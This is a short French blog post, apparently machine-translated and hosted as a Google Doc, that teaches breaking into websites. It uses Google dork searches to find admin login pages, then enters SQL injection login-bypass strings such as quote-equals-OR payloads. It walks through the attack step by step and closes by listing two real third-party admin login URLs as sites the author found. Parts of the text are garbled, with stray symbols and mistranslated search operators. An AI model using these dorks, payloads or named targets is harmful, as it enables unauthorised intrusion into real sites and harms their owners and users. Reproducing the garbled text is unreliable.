Create A Blog With Google Docs Sign In
t💨g '✨
📌👀✨🦆💨🌴👉💥⚡🌼🔊🎵👌

⇥⇗⇞⇈⇪⨹

⇗⇞

# 1 Connaissance appropriée des techniques de piratage:

Ce que vous obtiendrez dans cet article. L'article ci-dessous vous apprendra la technique de piratage de la manière la plus ordonnée et la plus simple.

# 2 Evil Brain

Vous avez atteint sur cette page, cela prouve 😉

 

 

Il existe de nombreuses façons de pirater des sites Web, cela dépend de nous de choisir la technique à pirater. Ici, je vais utiliser un combo de deux techniques, c'est-à-dire

# Google Dork

# Sql Injection

Notre premier objectif est de découvrir les sites Web vulnérables, pour cela nous avons besoin de google dorks. Google dork est une technique très simple, tout ce que vous avez à faire est; écrire un dork (les dorks ne sont que des formules pour trouver des sites Web vulnérables) dans la boîte de recherche Google et trouver les sites vulnérables.

Quelle sorte de dorks?

 

"Inurl:." Domaine "/" dorks ""

Donc, vous le comprendrez normalement comme ceci:

"inurl" = URL d'entrée

"domaine" = votre domaine souhaité ex. .gov

"dorks" = votre dork de votre choix

Vous pouvez utiliser les mots suivants au lieu d'inurl:

intitle:

inurl:

intext:

définir:

site:

répertoire:

cartes:

livre:

froogle:

info:

film:

météo: en

rapport:

lien:

Vous pouvez utiliser l'intitulé pour trouver quoi que ce soit dans le titre du site Web. Ce qui pourrait également être utile pour trouver des téléchargements ou autre chose.

intitle: index des mp3

Ceci est un exemple pour télécharger des chansons mp3 gratuitement.

Maintenant, ici, en utilisant dork, nous devons utiliser notre cerveau maléfique pour découvrir ce que la requête ou la formule donnera le résultat des sites Web vulnérables. Un exemple de ceci est donné dans la section pratique ci-dessous.

Donc, une fois que vous avez appris à connaître Google Dork, allons-y pour l'injection SQL.

Comment utiliser l'injection SQL?

 

C'est la partie la plus simple, une fois que vous avez trouvé un site Web vulnérable, il vous suffit de saisir le nom d'utilisateur et le mot de passe dans leur page de connexion comme ceci:

Nom d'utilisateur: '=' 'OU' Mot de

passe: '=' 'OU'

ou quelques autres injections sql comme:

"OU" 1 "=" 1 "-

" OU "1" = "1" ({

"OU" 1 "=" 1 "/ *

……. Et c'est tout !

Pratiquement:

Étape 1: utiliser dork comme

inurl: ”/ adminpanel / loginpage”

Le résultat est quelque chose comme ça

dork.png

Étape 2: Ouverture du premier lien et dans cette page de connexion en injectant notre commande sql

Nom d'utilisateur: '=' 'OU' Mot de

passe: '=' 'OU'

sql.png

Et c'est reparti

hacked.png

Certains des sites que j'ai trouvés en travaillant

Dork as:

inurl: "adminpanel / login"

------->>

http://www.mindsparktechnologies.com/UAT/ASL/adminpanel/login.html

http://optimaindia.in/adminpanel/login.php

This blog post is actually just a Google Doc! Create your own blog with Google Docs, in less than a minute.